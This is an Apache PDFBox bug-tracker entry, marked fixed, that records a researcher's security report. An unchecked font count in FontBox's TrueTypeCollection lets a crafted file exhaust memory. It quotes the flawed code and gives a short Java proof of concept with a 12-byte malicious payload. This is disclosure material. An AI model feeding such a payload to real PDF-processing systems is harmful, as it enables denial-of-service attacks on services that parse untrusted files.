Details
-
Bug
-
Status: Closed
-
Major
-
Resolution: Fixed
-
2.0.24, 3.0.0 PDFBox
-
None
Description
We got the following error report from Pinohans@JDArmy through security@
Description:
In FontBox of Apache PDFBox, a carefully crafted PDF
file can trigger an OutOfMemory-Exception while loading the file. This
issue affects Apache PDFBox version 1.8 to 3.0.0-alpha2.
Product: Apache PDFBox
Version: 1.8-3.0.0-alpha2
Affected component:
src/main/java/org/apache/fontbox/ttf/TrueTypeCollection.java
Vulnerability:
67 TrueTypeCollection(TTFDataStream stream) throws IOException 68 { 69 this.stream = stream; 70 71 // TTC header 72 String tag = stream.readTag(); 73 if (!tag.equals("ttcf")) 74 { 75 throw new IOException("Missing TTC header"); 76 } 77 float version = stream.read32Fixed(); 78 numFonts = (int)stream.readUnsignedInt(); # Vulnerability 79 fontOffsets = new long[numFonts]; # Vulnerability 80 for (int i = 0; i < numFonts; i++) 81 { 82 fontOffsets[i] = stream.readUnsignedInt(); 83 }
Attack vector:
import org.apache.fontbox.ttf.TrueTypeCollection; import java.io.*; public class main { public static void main(String[] args) throws IOException { byte[] payload = {0x74, 0x74, 0x63, 0x66, 0x00, 0x00, 0x00, 0x00, 0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF}; TrueTypeCollection ttc = new TrueTypeCollection(new ByteArrayInputStream(payload)); } }